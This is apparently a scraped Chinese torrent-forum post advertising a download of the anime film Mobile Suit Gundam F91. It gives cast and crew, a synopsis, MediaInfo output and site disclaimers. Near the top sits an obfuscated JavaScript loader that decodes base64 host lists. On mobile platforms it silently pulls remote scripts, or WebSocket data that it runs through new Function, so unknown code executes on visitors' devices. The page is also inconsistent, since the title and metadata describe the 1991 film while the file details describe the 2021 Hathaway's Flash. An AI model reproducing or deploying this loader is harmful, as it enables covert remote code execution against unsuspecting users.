机动战士高达F91[中文字幕].蓝光迅雷下载.Mobile.Suit.Gundam.Hathaway’s.Flash.2021.BluRay.1080p

版主小s 1月前 426

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 机动战士高达F91 / Mobile Suit Gundam F91

◎片 名 Mobile Suit Gundam F91

◎年 代 1991

◎产 地 日本

◎类 别 科幻 / 动画

◎语 言 日语

◎上映日期 1991-03-15

◎IMDb链接 https://www.imdb.com/title/tt0159568/

◎豆瓣评分 7.5/10 (2289人评价)

◎豆瓣链接 https://movie.douban.com/subject/1401540/

◎片 长 120 分钟

◎导 演 富野由悠季 Yoshiyuki Tomino (id:1042523)

◎编 剧 伊东恒久 Tsunehisa It? (id:1044076)

富野由悠季 Yoshiyuki Tomino (id:1042523)

◎演 员 辻谷耕史 K?ji Tsujitani (id:1048795)

冬马由美 Yumi T?ma (id:1037674)

池本小百合 Sayuri Ikemoto (id:1103418)

寺岛干夫 Mikio Terashima (id:1054114)

庄司美代子 Miyoko Sh?ji (id:1297540)

前田昌明 Masaaki Maeda (id:1191179)

坪井章子 Akiko Tsuboi (id:1398361)

草尾毅 Takeshi Kusao (id:1042356)

大木民夫 Tamio ?ki (id:1017335)

小林清志 Kiyoshi Kobayashi (id:1017061)

梁田清之 Kiyoyuki Yanada (id:1048682)

渡部猛 Takeshi Watabe (id:1164785)

若本规夫 Norio Wakamoto (id:1028783)

子安武人 Takehito Koyasu (id:1054354)

高户靖广 Yasuhiro Takato (id:1153319)

西村朋纮 Tomohiro Nishimura (id:1008414)

松野太纪 Taiki Matsuno (id:1349056)

折笠爱 Ai Orikasa (id:1038561)

伊仓一惠 Kazue Ikura (id:1003859)

小林优子 Y?ko Kobayashi (id:1006697)

吉田小南美 Konami Yoshida (id:1020290)

峰敦子 Atsuko Mine (id:1121107)

横尾麻里 Yokoo Mari (id:1402067)

一龙斋贞友 Teiy? Ichiry?sai (id:1149171)

佐藤佑晖 Hiroyuki Sat? (id:1146434)

天野由梨 Yuri Amano (id:1017114)

大友龙三郎 Ry?zabur? ?tomo (id:1048712)

竹村拓 Hiroshi Takemura (id:1044441)

盐屋翼 Yoku Shioya (id:1013105)

神代知衣 Chie K?jiro (id:1321134)

远藤章史 Endou Akifumi (id:1444587)

田口昂 Takashi Taguchi (id:1239648)

上村典子 Noriko Uemura (id:1342363)

稻叶实 Minoru Inaba (id:1109164)

池田胜 Masaru Ikeda (id:1031282)

牛山茂 Shigeru Ushiyama (id:1373627)

喜多川拓郎 Kitagawa Takurou (id:1400110)

平野正人 Hirano Masato (id:1408134)

桥本博 Hashimoto Hiroshi (id:1444588)

柯克·桑顿 Kirk Thornton (id:1159544)

米歇尔·拉夫 Michelle Ruff (id:1139744)

Bob Papenbrook Bob Papenbrook (id:1131532)

Tony Pope Tony Pope (id:1129002)

莫娜·马歇尔 Mona Marshall (id:1121377)

贾米森·普赖斯 Jamieson Price (id:1120847)

道格·斯通 Doug Stone (id:1114264)

莱克斯·朗 Lex Lang (id:1110937)

戴夫·维滕博格 Dave Wittenberg (id:1192728)

德里克·斯蒂芬·普林斯 Derek Stephen Prince (id:1204133)

Lia Sargent Lia Sargent (id:1296705)

Tom Wyner Tom Wyner (id:1105660)

温迪·李 Wendee Lee (id:1031827)

梅洛迪·斯佩瓦克 Melodee Spevack (id:1028479)

戴夫·麦罗 Dave Mallow (id:1028443)

史蒂夫·克莱默 Steve Kramer (id:1048019)

托尼·奥立佛 Tony Oliver (id:1048375)

Julie Maddalena Julie Maddalena (id:1102974)

芭芭拉·古德森 Barbara Goodson (id:1102389)

Julie Ann Taylor Julie Ann Taylor (id:1092137)

Joshua Seth Joshua Seth (id:1082666)

迈克尔·福瑞斯特 Michael Forest (id:1081642)

桑迪·福克斯 Sandy Fox (id:1077958)

Paul St. Peter Paul St. Peter (id:1076021)

Philece Sampler Philece Sampler (id:1074155)

Steve Staley Steve Staley (id:1072595)

大河原邦男 Kunio Okawara (id:1132476)

奥野浩行 Okuno Hiroyuki (id:1431886)

平松祯史 Hiramatsu Tadashi (id:1426096)

◎标 签 高达 / Gundam / 动画 / 日本 / 日本动画 / 剧场版 / F91 / 科幻

◎简 介

《机动战士高达F91》的电影版于1991年3月16日上演,影片描写0123年3月16日至3月30日“克洛斯邦·班卡多动乱”(CrossboneVanguard)时期的故事。

U.C.0123年3月16日,殖民卫星FRONTIERSIDE遭到自称C.V(死亡先锋)的迷之MS部队袭击,造成FRONTIERⅣ的500多居民死亡、14万人避难。在避难的人群中有GUNDAMF91开发者之一梅凌·亚诺博士的一对子女西布顿(シ—ブックアノ—)、丽诗,以及罗拿家族的次女贝拉·罗拿,又名茜茜莉·费尔齐。罗拿家族是C.V的领导者,提倡贵族主义并欲统一殖民卫星、建立宇宙巴比伦空中花园。茜茜莉的母亲娜迪亚不满于家族的束缚而和一名叫史奥·费尔齐的下人私奔,当她发现史奥卑劣的人格后又抛下自己的女儿不知所踪。当西布顿等人来到码头,在其父洛士尼·亚诺的带领下登...

  1. General

  2. Unique ID : 181383962976627527357813245479833299754 (0x887547D39EFE7379F7624412917BEB2A)

  3. Complete name : Mobile.Suit.Gundam.Hathaway’s.Flash.2021.BluRay.1080p.10bit.TrueHD(Atmos).7.1.x265-beAst.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.00 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.0 Mb/s

  10. Movie name : Mobile.Suit.Gundam.Hathaway’[email protected]

  11. Encoded date : UTC 2021-06-16 10:38:06

  12. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.2

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@High

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 35 min

  23. Bit rate : 5 812 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.117

  33. Stream size : 3.88 GiB (39%)

  34. Title : HEVC, [email protected]@High, 24000/1001 fps @ 5811 kbps

  35. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  36. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / no-pmode / pme / no-psnr / ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=137328 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=5 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=2.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=1.20 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  37. Language : Japanese

  38. Default : Yes

  39. Forced : No

  40. Color range : Limited

  41. Color primaries : BT.709

  42. Transfer characteristics : BT.709

  43. Matrix coefficients : BT.709


  44. Audio #1

  45. ID : 2

  46. Format : MLP FBA 16-ch

  47. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  48. Commercial name : Dolby TrueHD with Dolby Atmos

  49. Codec ID : A_TRUEHD

  50. Duration : 1 h 35 min

  51. Bit rate mode : Variable

  52. Bit rate : 8 220 kb/s

  53. Maximum bit rate : 14.5 Mb/s

  54. Channel(s) : 8 channels

  55. Channel layout : L R C LFE Ls Rs Lb Rb

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 1 200.000 FPS (40 SPF)

  58. Compression mode : Lossless

  59. Stream size : 5.48 GiB (55%)

  60. Title : Japanese Dolby TrueHD(Atmos) Audio 7.1 @ 8202 kbps

  61. Language : Japanese

  62. Default : Yes

  63. Forced : No

  64. Number of dynamic objects : 15

  65. Bed channel count : 1 channel

  66. Bed channel configuration : LFE


  67. Audio #2

  68. ID : 3

  69. Format : AC-3

  70. Format/Info : Audio Coding 3

  71. Commercial name : Dolby Digital

  72. Codec ID : A_AC3

  73. Duration : 1 h 35 min

  74. Bit rate mode : Constant

  75. Bit rate : 640 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 437 MiB (4%)

  82. Title : Japanese Dolby Digital Audio 5.1 @ 640 kbps

  83. Language : Japanese

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : AC-3

  90. Format/Info : Audio Coding 3

  91. Commercial name : Dolby Digital

  92. Codec ID : A_AC3

  93. Duration : 1 h 35 min

  94. Bit rate mode : Constant

  95. Bit rate : 192 kb/s

  96. Channel(s) : 2 channels

  97. Channel layout : L R

  98. Sampling rate : 48.0 kHz

  99. Frame rate : 31.250 FPS (1536 SPF)

  100. Compression mode : Lossy

  101. Stream size : 131 MiB (1%)

  102. Title : Japanese Dolby Digital Audio 2.0 @ 192 kbps Commentary

  103. Language : Japanese

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Text #1

  108. ID : 5

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 29 min

  114. Bit rate : 33.7 kb/s

  115. Count of elements : 2926

  116. Stream size : 21.6 MiB (0%)

  117. Title : Jpn/SUP 原盘日语

  118. Language : Japanese

  119. Default : No

  120. Forced : No


  121. Text #2

  122. ID : 6

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 33 min

  128. Bit rate : 32.9 kb/s

  129. Count of elements : 2086

  130. Stream size : 22.1 MiB (0%)

  131. Title : Eng/SUP 原盘英语

  132. Language : English

  133. Default : No

  134. Forced : No


  135. Text #3

  136. ID : 7

  137. Format : PGS

  138. Muxing mode : zlib

  139. Codec ID : S_HDMV/PGS

  140. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration : 1 h 33 min

  142. Bit rate : 34.6 kb/s

  143. Count of elements : 2435

  144. Stream size : 23.3 MiB (0%)

  145. Title : Chs/SUP 原盘简中

  146. Language : Chinese

  147. Default : Yes

  148. Forced : No


  149. Text #4

  150. ID : 8

  151. Format : PGS

  152. Muxing mode : zlib

  153. Codec ID : S_HDMV/PGS

  154. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  155. Duration : 1 h 33 min

  156. Bit rate : 34.5 kb/s

  157. Count of elements : 2365

  158. Stream size : 23.2 MiB (0%)

  159. Title : Cht/SUP 原盘繁中

  160. Language : Chinese

  161. Default : No

  162. Forced : No


  163. Text #5

  164. ID : 9

  165. Format : PGS

  166. Muxing mode : zlib

  167. Codec ID : S_HDMV/PGS

  168. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  169. Duration : 1 h 33 min

  170. Bit rate : 35.0 kb/s

  171. Count of elements : 2367

  172. Stream size : 23.5 MiB (0%)

  173. Title : Cht/SUP 原盘繁中

  174. Language : Chinese

  175. Default : No

  176. Forced : No


  177. Menu

  178. 00:00:00.000 : en:第 01 章

  179. 00:06:31.849 : en:第 02 章

  180. 00:15:55.120 : en:第 03 章

  181. 00:17:24.835 : en:第 04 章

  182. 00:24:24.129 : en:第 05 章

  183. 00:29:57.670 : en:第 06 章

  184. 00:34:54.759 : en:第 07 章

  185. 00:38:36.522 : en:第 08 章

  186. 00:43:35.237 : en:第 09 章

  187. 00:48:31.867 : en:第 10 章

  188. 00:54:51.079 : en:第 11 章

  189. 01:04:54.098 : en:第 12 章

  190. 01:11:23.195 : en:第 13 章

  191. 01:14:13.991 : en:第 14 章

  192. 01:19:20.464 : en:第 15 章

  193. 01:26:37.483 : en:第 16 章

  194. 01:30:55.867 : en:第 17 章

  195. 01:35:27.722 : en:第 18 章


此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动画 科幻

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖